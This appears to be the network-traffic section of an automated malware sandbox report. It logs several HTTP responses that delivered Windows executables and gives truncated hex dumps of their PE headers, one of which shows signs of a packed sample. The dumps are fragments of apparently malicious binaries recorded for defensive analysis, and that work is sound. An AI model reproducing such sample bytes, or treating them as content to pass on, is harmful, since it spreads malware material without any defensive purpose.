00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 19:47:30 GMTContent-Type: application/octet-streamContent-Length: 1896960Last-Modified: Fri, 28 Jun 2024 18:11:28 GMTConnection: keep-aliveETag: "667efcd0-1cf200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 8b eb 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 87 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 87 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 78 6c 65 77 65 7a 00 e0 19 00 00 b0 31 00 00 da 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 68 76 78 63 7a 74 76 00 10 00 00 00 90 4b 00 00 04 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4b 00 00 22 00 00 00 d0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 19:47:42 GMTContent-Type: application/octet-streamContent-Length: 2452992Last-Modified: Fri, 28 Jun 2024 16:09:55 GMTConnection: keep-aliveETag: "667ee053-256e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 14 14 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 20 9d 00 73 0c 00 00 94 2c 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 